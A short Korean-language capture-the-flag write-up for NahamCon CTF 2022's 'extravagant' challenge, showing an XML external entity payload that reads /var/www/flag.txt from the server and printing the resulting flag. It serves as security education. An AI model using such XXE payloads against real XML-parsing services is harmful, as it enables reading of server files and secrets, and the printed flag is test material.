[NahamCon_CTF_2022] extravagant

1. 개요

XML external entity attack(xml 외부 엔티티 공격) 문제

참고 자료

XXExternalXX

XML_external_entity_attack

 

2. 풀이

1) 분석

사이트를 둘러보면 xml를 업로드하고, 확인할 수 있습니다.

2) XML 외부 엔티티 공격

flag는 /var/www 에 있다고 했습니다. 해당 경로를 읽어줍니다.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///var/www/flag.txt"> ]>
<root>
    <data>&xxe;</data>
</root>

3) 결과

 

 

3. flag

flag{639b72f2dd0017f454c44c3863c4e195}